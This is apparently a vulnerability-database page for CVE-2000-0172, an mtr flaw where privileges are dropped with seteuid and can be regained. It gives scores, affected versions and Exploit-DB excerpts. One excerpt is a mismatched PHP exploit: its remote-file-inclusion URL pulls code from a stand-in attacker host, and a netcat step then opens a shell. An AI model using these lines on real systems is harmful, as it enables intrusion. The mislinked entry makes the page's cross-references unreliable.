CVE-2000-0172
published 2000-03-03CVE-2000-0172: The mtr program only uses a seteuid call when attempting to drop privileges, which could allow local users to gain root privileges.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.82%
52.7th percentile
The mtr program only uses a seteuid call when attempting to drop privileges, which could allow local users to gain root privileges.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| matt_kimball_and_roger_wolff | mtr | — | — |
| matt_kimball_and_roger_wolff | mtr | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
| turbolinux | turbolinux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
exploitdb·2004-12-28
CVE-2003-0172 PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
PHP 4.3.7 - 'openlog()' Remote Buffer Overflow
---
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better then parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisor
Exploit-DB
Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
exploitdb·2000-03-03
CVE-2000-0172 Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
---
// source: https://www.securityfocus.com/bid/1038/info
A potential vulnerability exists in the 'mtr' program, by Matt Kimball and Roger Wolff. Versions prior to 0.42 incorrectly dropped privileges on all Unix variants except HPUX. By calling a seteuid(getuid()) call, the authors hoped to drop permissions to prevent the obtaining of root privilege should there be potential vulnerabilities in mtr or a library it depends on. However, due to saved uid semantics, the uid of 0 can be recovered simply by doing a setuid(0). An attacker would only need to find an overflow in one of the libraries mtr uses, such as gtk or curses. In patched versions, the seteuid() call has been changed to setuid(). This will e
No writeups or analysis indexed.
2000-03-03
Published